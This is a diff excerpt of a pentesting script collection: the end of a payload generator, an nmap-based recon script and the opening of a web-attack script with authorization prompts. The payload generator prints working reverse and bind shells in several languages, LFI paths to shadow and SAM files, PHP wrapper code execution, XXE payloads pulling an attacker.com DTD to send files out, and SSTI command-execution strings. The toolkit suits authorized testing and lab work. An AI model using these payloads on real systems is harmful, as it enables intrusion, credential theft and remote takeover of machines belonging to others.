python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$lhost",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||||
|
|
||||||
|
# PHP Reverse Shell
|
||||||
|
php -r '\$sock=fsockopen("$lhost",$lport);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||||
|
|
||||||
|
# Perl Reverse Shell
|
||||||
|
perl -e 'use Socket;\$i="$lhost";\$p=$lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||||
|
|
||||||
|
# Ruby Reverse Shell
|
||||||
|
ruby -rsocket -e'f=TCPSocket.open("$lhost",$lport).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
bind)
|
||||||
|
cat << EOF
|
||||||
|
# Bind Shells (listen on target)
|
||||||
|
nc -lvnp $lport -e /bin/bash
|
||||||
|
nc -lvp $lport -e /bin/sh
|
||||||
|
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp $lport >/tmp/f
|
||||||
|
|
||||||
|
# Python Bind Shell
|
||||||
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0",$lport));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);subprocess.call(["/bin/sh","-i"])'
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Unknown shell variant:${NC} $variant"
|
||||||
|
echo "Available: reverse, bind"
|
||||||
|
return 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# LFI Payloads
|
||||||
|
generate_lfi() {
|
||||||
|
local variant="${1:-linux}"
|
||||||
|
|
||||||
|
case "$variant" in
|
||||||
|
linux)
|
||||||
|
cat << 'EOF'
|
||||||
|
# Basic LFI
|
||||||
|
/etc/passwd
|
||||||
|
../etc/passwd
|
||||||
|
../../etc/passwd
|
||||||
|
../../../etc/passwd
|
||||||
|
../../../../etc/passwd
|
||||||
|
../../../../../etc/passwd
|
||||||
|
|
||||||
|
# Interesting Linux files
|
||||||
|
/etc/shadow
|
||||||
|
/etc/group
|
||||||
|
/etc/hosts
|
||||||
|
/etc/motd
|
||||||
|
/etc/issue
|
||||||
|
/proc/self/environ
|
||||||
|
/proc/version
|
||||||
|
/proc/cmdline
|
||||||
|
/var/log/apache2/access.log
|
||||||
|
/var/log/apache2/error.log
|
||||||
|
/var/log/auth.log
|
||||||
|
/var/log/syslog
|
||||||
|
|
||||||
|
# PHP wrappers
|
||||||
|
php://filter/convert.base64-encode/resource=/etc/passwd
|
||||||
|
php://filter/read=string.rot13/resource=/etc/passwd
|
||||||
|
expect://whoami
|
||||||
|
data://text/plain,<?php system($_GET['cmd']);?>
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
windows)
|
||||||
|
cat << 'EOF'
|
||||||
|
# Windows LFI
|
||||||
|
C:\Windows\System32\drivers\etc\hosts
|
||||||
|
C:\Windows\win.ini
|
||||||
|
C:\Windows\system.ini
|
||||||
|
C:\Windows\System32\config\SAM
|
||||||
|
C:\Windows\System32\config\SYSTEM
|
||||||
|
C:\Windows\repair\SAM
|
||||||
|
C:\Windows\repair\SYSTEM
|
||||||
|
C:\inetpub\wwwroot\web.config
|
||||||
|
|
||||||
|
# Path traversal
|
||||||
|
..\..\..\Windows\System32\drivers\etc\hosts
|
||||||
|
..\..\..\..\Windows\win.ini
|
||||||
|
EOF
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Unknown LFI variant:${NC} $variant"
|
||||||
|
echo "Available: linux, windows"
|
||||||
|
return 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# XXE Payloads
|
||||||
|
generate_xxe() {
|
||||||
|
cat << 'EOF'
|
||||||
|
# Basic XXE
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
|
||||||
|
<foo>&xxe;</foo>
|
||||||
|
|
||||||
|
# XXE with external DTD
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
|
||||||
|
<foo>&exfil;</foo>
|
||||||
|
|
||||||
|
# Blind XXE
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">
|
||||||
|
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
|
||||||
|
%dtd;]>
|
||||||
|
|
||||||
|
# XXE OOB data exfiltration
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE foo [
|
||||||
|
<!ENTITY % file SYSTEM "file:///etc/passwd">
|
||||||
|
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
|
||||||
|
%dtd;]>
|
||||||
|
EOF
|
||||||
|
}
|
||||||
|
|
||||||
|
# SSTI Payloads
|
||||||
|
generate_ssti() {
|
||||||
|
cat << 'EOF'
|
||||||
|
# Jinja2 (Python/Flask)
|
||||||
|
{{7*7}}
|
||||||
|
{{config}}
|
||||||
|
{{config.items()}}
|
||||||
|
{{''.__class__.__mro__[2].__subclasses__()}}
|
||||||
|
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
|
||||||
|
|
||||||
|
# Twig (PHP)
|
||||||
|
{{7*7}}
|
||||||
|
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||||
|
|
||||||
|
# Freemarker (Java)
|
||||||
|
${7*7}
|
||||||
|
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
|
||||||
|
|
||||||
|
# Thymeleaf (Java)
|
||||||
|
${7*7}
|
||||||
|
${T(java.lang.Runtime).getRuntime().exec('id')}
|
||||||
|
|
||||||
|
# Velocity (Java)
|
||||||
|
#set($str=$class.inspect("java.lang.String").type)
|
||||||
|
#set($chr=$class.inspect("java.lang.Character").type)
|
||||||
|
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id"))
|
||||||
|
EOF
|
||||||
|
}
|
||||||
|
|
||||||
|
# List all payloads
|
||||||
|
list_payloads() {
|
||||||
|
echo -e "${BOLD}${CYAN}Available Payload Types:${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}SQL Injection:${NC}"
|
||||||
|
echo " payload sql basic - Basic SQL injection"
|
||||||
|
echo " payload sql auth-bypass - Authentication bypass"
|
||||||
|
echo " payload sql union - UNION-based injection"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Cross-Site Scripting (XSS):${NC}"
|
||||||
|
echo " payload xss basic - Basic XSS payloads"
|
||||||
|
echo " payload xss reflected - Reflected XSS"
|
||||||
|
echo " payload xss stored - Stored/persistent XSS"
|
||||||
|
echo " payload xss dom - DOM-based XSS"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Command Injection:${NC}"
|
||||||
|
echo " payload cmd linux - Linux command injection"
|
||||||
|
echo " payload cmd windows - Windows command injection"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Reverse Shells:${NC}"
|
||||||
|
echo " payload shell reverse IP PORT - Reverse shell payloads"
|
||||||
|
echo " payload shell bind PORT - Bind shell payloads"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}File Inclusion:${NC}"
|
||||||
|
echo " payload lfi linux - Linux LFI/path traversal"
|
||||||
|
echo " payload lfi windows - Windows LFI/path traversal"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Other:${NC}"
|
||||||
|
echo " payload xxe - XML external entity"
|
||||||
|
echo " payload ssti - Server-side template injection"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main logic
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
type="$1"
|
||||||
|
shift
|
||||||
|
|
||||||
|
case "$type" in
|
||||||
|
list|ls)
|
||||||
|
list_payloads
|
||||||
|
;;
|
||||||
|
sql)
|
||||||
|
generate_sql "$@"
|
||||||
|
;;
|
||||||
|
xss)
|
||||||
|
generate_xss "$@"
|
||||||
|
;;
|
||||||
|
cmd|command)
|
||||||
|
generate_cmd "$@"
|
||||||
|
;;
|
||||||
|
shell|shells)
|
||||||
|
generate_shell "$@"
|
||||||
|
;;
|
||||||
|
lfi)
|
||||||
|
generate_lfi "$@"
|
||||||
|
;;
|
||||||
|
xxe)
|
||||||
|
generate_xxe
|
||||||
|
;;
|
||||||
|
ssti|template)
|
||||||
|
generate_ssti
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown payload type: $type"
|
||||||
|
echo "Run 'payload list' to see available types"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
196
scripts/pentesting/recon
Executable file
196
scripts/pentesting/recon
Executable file
|
|
@ -0,0 +1,196 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: recon.sh
|
||||||
|
# Description: Network/host reconnaissance with tmux orchestration
|
||||||
|
# Usage: recon <target>
|
||||||
|
# Creates tmux window with parallel nmap scans and enum4linux
|
||||||
|
|
||||||
|
VERSION="2.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Status indicators
|
||||||
|
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||||
|
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||||
|
readonly REDMINUS="${RED}[-]${NC}"
|
||||||
|
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}recon${NC} - Network Reconnaissance Script v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " recon <target>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||||
|
echo " Creates tmux window with 3 panes running parallel reconnaissance:"
|
||||||
|
echo " - Pane 1: nmap service scan + version detection"
|
||||||
|
echo " - Pane 2: nmap vulnerability scan + full port scan"
|
||||||
|
echo " - Pane 3: enum4linux-ng (SMB enumeration)"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLE:${NC}"
|
||||||
|
echo " recon 10.10.10.5"
|
||||||
|
echo " recon target.htb"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OUTPUT:${NC}"
|
||||||
|
echo " All results saved to: ./recon-<target>-<timestamp>/"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check required tools
|
||||||
|
check_tools() {
|
||||||
|
local missing=()
|
||||||
|
|
||||||
|
command -v nmap &>/dev/null || missing+=("nmap")
|
||||||
|
command -v tmux &>/dev/null || missing+=("tmux")
|
||||||
|
|
||||||
|
# Optional tools
|
||||||
|
if ! command -v naabu &>/dev/null; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} naabu not found (optional - using pure nmap)"
|
||||||
|
fi
|
||||||
|
|
||||||
|
if ! command -v docker &>/dev/null; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} docker not found (skipping enum4linux-ng)"
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||||
|
echo "Install with: sudo apt install ${missing[*]}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir() {
|
||||||
|
local target="$1"
|
||||||
|
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||||
|
local clean_target=$(echo "$target" | tr '/:' '_')
|
||||||
|
|
||||||
|
OUTPUT_DIR="recon-${clean_target}-${timestamp}"
|
||||||
|
mkdir -p "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main recon function
|
||||||
|
run_recon() {
|
||||||
|
local target="$1"
|
||||||
|
|
||||||
|
echo -e "${CYAN}${BOLD}"
|
||||||
|
echo "╔════════════════════════════════════════════════════════════╗"
|
||||||
|
echo "║ Network Reconnaissance ║"
|
||||||
|
echo "║ Target: $target"
|
||||||
|
echo "╚════════════════════════════════════════════════════════════╝"
|
||||||
|
echo -e "${NC}"
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir "$target"
|
||||||
|
|
||||||
|
# Check if in tmux
|
||||||
|
if [[ -z "${TMUX:-}" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Not in tmux session - results will be in terminal"
|
||||||
|
run_scans_sequential "$target"
|
||||||
|
return
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Create tmux window
|
||||||
|
tmux new-window -n "<<Recon: $target>>"
|
||||||
|
|
||||||
|
# Split into 3 panes
|
||||||
|
# Bottom pane (pane 0)
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Top left pane (pane 1)
|
||||||
|
tmux select-pane -t 0
|
||||||
|
tmux split-window -h
|
||||||
|
|
||||||
|
# Top right pane (pane 2)
|
||||||
|
tmux select-pane -t 1
|
||||||
|
tmux split-window -h
|
||||||
|
|
||||||
|
# Pane 0 (bottom): Quick scan + detailed scan
|
||||||
|
tmux select-pane -t 0
|
||||||
|
if command -v naabu &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting quick port discovery with naabu...${NC}' && naabu -host $target -nmap-cli 'nmap -A -T4 -oA nmap_quick' && echo -e '\n${GREENSTAR} Starting detailed scan...${NC}\n' && naabu -host $target -nmap-cli 'nmap -sV -sC -Pn -oN nmap_detailed'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nmap scan...${NC}' && nmap -sV -sC -T4 -oA nmap_quick $target && echo -e '\n${GREENSTAR} Starting detailed scan...${NC}\n' && nmap -sV -sC -Pn -oN nmap_detailed $target" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 1 (top left): Vulnerability scan + full port scan
|
||||||
|
tmux select-pane -t 1
|
||||||
|
if command -v naabu &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting vulnerability scan...${NC}' && naabu -host $target -nmap-cli 'nmap --script vuln -Pn -oN nmap_vuln' && echo -e '\n${GREENSTAR} Starting full port scan (all 65535)...${NC}\n' && nmap -p- -T4 $target -oN nmap_fullports" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting vulnerability scan...${NC}' && nmap --script vuln -Pn -oN nmap_vuln $target && echo -e '\n${GREENSTAR} Starting full port scan...${NC}\n' && nmap -p- -T4 $target -oN nmap_fullports" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 2 (top right): enum4linux-ng
|
||||||
|
tmux select-pane -t 2
|
||||||
|
if command -v docker &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting enum4linux-ng (SMB enumeration)...${NC}' && docker run --rm -t enum4linux-ng -A -C $target -oY enum4linux-ng.yaml | tee enum4linux-ng.txt" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ Docker not available - skipping enum4linux-ng${NC}' && echo 'Install docker to enable SMB enumeration' && sleep 5" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Focus back on bottom pane
|
||||||
|
tmux select-pane -t 0
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}✓${NC} Tmux recon window created"
|
||||||
|
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}<<Recon: $target>>${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
|
||||||
|
run_scans_sequential() {
|
||||||
|
local target="$1"
|
||||||
|
|
||||||
|
cd "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running nmap service scan...${NC}"
|
||||||
|
if command -v naabu &>/dev/null; then
|
||||||
|
naabu -host "$target" -nmap-cli 'nmap -sV -sC -T4 -oA nmap_quick'
|
||||||
|
else
|
||||||
|
nmap -sV -sC -T4 -oA nmap_quick "$target"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running vulnerability scan...${NC}"
|
||||||
|
nmap --script vuln -Pn -oN nmap_vuln "$target"
|
||||||
|
|
||||||
|
if command -v docker &>/dev/null; then
|
||||||
|
echo -e "\n${GREENSTAR} Running enum4linux-ng...${NC}"
|
||||||
|
docker run --rm -t enum4linux-ng -A -C "$target" -oY enum4linux-ng.yaml | tee enum4linux-ng.txt
|
||||||
|
fi
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
|
||||||
|
echo -e "\n${GREEN}✓${NC} Recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
target="$1"
|
||||||
|
|
||||||
|
# Validate target
|
||||||
|
if [[ -z "$target" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Target required"
|
||||||
|
echo "Usage: recon <target>"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check tools
|
||||||
|
check_tools
|
||||||
|
|
||||||
|
# Run reconnaissance
|
||||||
|
run_recon "$target"
|
||||||
460
scripts/pentesting/web-attack
Executable file
460
scripts/pentesting/web-attack
Executable file
|
|
@ -0,0 +1,460 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: web-attack
|
||||||
|
# Description: Web application OWASP Top 10 exploitation testing
|
||||||
|
# Usage: web-attack <url>
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Status indicators
|
||||||
|
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||||
|
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||||
|
readonly REDMINUS="${RED}[-]${NC}"
|
||||||
|
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}web-attack${NC} - OWASP Top 10 Exploitation Testing v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " web-attack <url>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||||
|
echo " Active exploitation testing for OWASP Top 10 vulnerabilities"
|
||||||
|
echo " Creates tmux window with 6 panes running parallel attacks"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}⚠️ AUTHORIZATION REQUIRED ⚠️${NC}"
|
||||||
|
echo -e " ${RED}Only use on:${NC}"
|
||||||
|
echo " ✓ localhost/127.0.0.1 (your own systems)"
|
||||||
|
echo " ✓ Authorized penetration testing targets"
|
||||||
|
echo " ✓ Bug bounty programs (within scope)"
|
||||||
|
echo " ✓ Lab environments (DVWA, Juice Shop, etc.)"
|
||||||
|
echo
|
||||||
|
echo " ✗ NEVER use on unauthorized targets"
|
||||||
|
echo " ✗ Illegal without explicit permission"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}TESTS PERFORMED:${NC}"
|
||||||
|
echo " 1. SQL Injection (sqlmap)"
|
||||||
|
echo " 2. XSS Detection (dalfox)"
|
||||||
|
echo " 3. Command Injection (commix)"
|
||||||
|
echo " 4. XXE / SSRF Testing"
|
||||||
|
echo " 5. Authentication Bypass"
|
||||||
|
echo " 6. LFI/RFI Testing"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}RECOMMENDED WORKFLOW:${NC}"
|
||||||
|
echo " ${GREEN}1.${NC} Run reconnaissance first:"
|
||||||
|
echo " ${BOLD}web-recon http://localhost:3002${NC}"
|
||||||
|
echo " (Discovers endpoints, forms, parameters)"
|
||||||
|
echo
|
||||||
|
echo " ${GREEN}2.${NC} Then run exploitation:"
|
||||||
|
echo " ${BOLD}web-attack http://localhost:3002${NC}"
|
||||||
|
echo " (Tests discovered attack surface)"
|
||||||
|
echo
|
||||||
|
echo " ${YELLOW}⚠${NC} Running web-attack alone will find fewer vulnerabilities"
|
||||||
|
echo " ${YELLOW}⚠${NC} Tools need discovered endpoints/parameters for best results"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " web-attack http://localhost:3002"
|
||||||
|
echo " web-attack http://localhost:8080 # DVWA"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OUTPUT:${NC}"
|
||||||
|
echo " All results saved to: ./web-attack-<target>-<timestamp>/"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}SAFETY FEATURES:${NC}"
|
||||||
|
echo " • Localhost check (warns for non-local targets)"
|
||||||
|
echo " • Rate limiting (--throttle)"
|
||||||
|
echo " • No destructive payloads by default"
|
||||||
|
echo " • PoC-focused (prove vulnerability, don't exploit)"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Authorization check
|
||||||
|
check_authorization() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
# Extract hostname
|
||||||
|
local hostname=$(echo "$url" | sed -E 's~https?://~~' | cut -d: -f1 | cut -d/ -f1)
|
||||||
|
|
||||||
|
# Check if localhost
|
||||||
|
if [[ "$hostname" =~ ^(localhost|127\\.0\\.0\\.1|0\\.0\\.0\\.0)$ ]]; then
|
||||||
|
echo -e "${GREEN}✓${NC} Target is localhost - authorized"
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check if HTB/THM/CTF
|
||||||
|
if [[ "$hostname" =~ \\.(htb|thm)$ ]]; then
|
||||||
|
echo -e "${GREEN}✓${NC} Target is CTF platform - authorized"
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Warn for external targets
|
||||||
|
echo -e "${RED}⚠️ WARNING:${NC} Target is NOT localhost!"
|
||||||
|
echo -e "${YELLOW}Target:${NC} $hostname"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}Do you have written authorization to test this target?${NC}"
|
||||||
|
echo " • Signed penetration testing agreement?"
|
||||||
|
echo " • Bug bounty program with this target in scope?"
|
||||||
|
echo " • Own the target infrastructure?"
|
||||||
|
echo
|
||||||
|
read -p "Type 'YES' to confirm authorization: " -r confirm
|
||||||
|
|
||||||
|
if [[ "$confirm" != "YES" ]]; then
|
||||||
|
echo -e "${RED}Authorization not confirmed. Exiting.${NC}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Authorization confirmed by user"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check required tools
|
||||||
|
check_tools() {
|
||||||
|
local missing=()
|
||||||
|
local optional_missing=()
|
||||||
|
|
||||||
|
# Core tools
|
||||||
|
command -v tmux &>/dev/null || missing+=("tmux")
|
||||||
|
|
||||||
|
# Attack tools (all optional but warn)
|
||||||
|
command -v sqlmap &>/dev/null || optional_missing+=("sqlmap")
|
||||||
|
command -v dalfox &>/dev/null || optional_missing+=("dalfox")
|
||||||
|
command -v nuclei &>/dev/null || optional_missing+=("nuclei")
|
||||||
|
command -v ffuf &>/dev/null || optional_missing+=("ffuf")
|
||||||
|
command -v commix &>/dev/null || optional_missing+=("commix")
|
||||||
|
|
||||||
|
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||||
|
echo -e "${CYAN}Install with:${NC}"
|
||||||
|
for tool in "${optional_missing[@]}"; do
|
||||||
|
case "$tool" in
|
||||||
|
sqlmap) echo " sudo apt install sqlmap (or: pipx install sqlmap-dev)" ;;
|
||||||
|
dalfox) echo " go install github.com/hahwul/dalfox/v2@latest" ;;
|
||||||
|
nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
|
||||||
|
ffuf) echo " go install github.com/ffuf/ffuf/v2@latest" ;;
|
||||||
|
commix) echo " pipx install commix" ;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
# Find most recent web-recon data for this target
|
||||||
|
find_recon_data() {
|
||||||
|
local url="$1"
|
||||||
|
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||||
|
|
||||||
|
# Look for web-recon directories matching this target (most recent first)
|
||||||
|
local recon_dir=$(ls -dt web-recon-*"${clean_url}"* 2>/dev/null | head -1)
|
||||||
|
|
||||||
|
if [[ -n "$recon_dir" ]] && [[ -f "$recon_dir/urls.txt" ]]; then
|
||||||
|
# Check if recon data is recent (within last 24 hours)
|
||||||
|
local recon_age=$(stat -c %Y "$recon_dir" 2>/dev/null || stat -f %m "$recon_dir" 2>/dev/null)
|
||||||
|
local current_time=$(date +%s)
|
||||||
|
local age_hours=$(( ($current_time - $recon_age) / 3600 ))
|
||||||
|
|
||||||
|
if [[ $age_hours -lt 24 ]]; then
|
||||||
|
echo "$recon_dir"
|
||||||
|
return 0
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
return 1
|
||||||
|
}
|
||||||
|
|
||||||
|
setup_output_dir() {
|
||||||
|
local url="$1"
|
||||||
|
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||||
|
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||||
|
|
||||||
|
OUTPUT_DIR="web-attack-${clean_url}-${timestamp}"
|
||||||
|
mkdir -p "$OUTPUT_DIR"
|
||||||
|
mkdir -p "$OUTPUT_DIR/sqlmap"
|
||||||
|
mkdir -p "$OUTPUT_DIR/commix"
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
|
||||||
|
# Check for recent web-recon data
|
||||||
|
RECON_DIR=$(find_recon_data "$url")
|
||||||
|
if [[ -n "$RECON_DIR" ]]; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Found recent recon data: ${BOLD}$RECON_DIR${NC}"
|
||||||
|
|
||||||
|
# Copy recon URLs for exploitation tools
|
||||||
|
if [[ -f "$RECON_DIR/urls.txt" ]] && [[ -s "$RECON_DIR/urls.txt" ]]; then
|
||||||
|
cp "$RECON_DIR/urls.txt" "$OUTPUT_DIR/recon-urls.txt"
|
||||||
|
local url_count=$(wc -l < "$OUTPUT_DIR/recon-urls.txt")
|
||||||
|
echo -e "${GREEN}✓${NC} Imported ${BOLD}${url_count} URLs${NC} from web-recon for testing"
|
||||||
|
RECON_URLS="$OUTPUT_DIR/recon-urls.txt"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo -e "${YELLOW}⚠${NC} No recent web-recon data - tools will use deep crawl mode"
|
||||||
|
echo -e "${CYAN}Tip:${NC} Run ${BOLD}web-recon $url${NC} first for better results"
|
||||||
|
RECON_URLS=""
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Attempt to get authentication token for Juice Shop
|
||||||
|
get_juice_shop_auth() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
# Check if this is Juice Shop (localhost:3002)
|
||||||
|
if [[ ! "$url" =~ localhost:3002 ]]; then
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
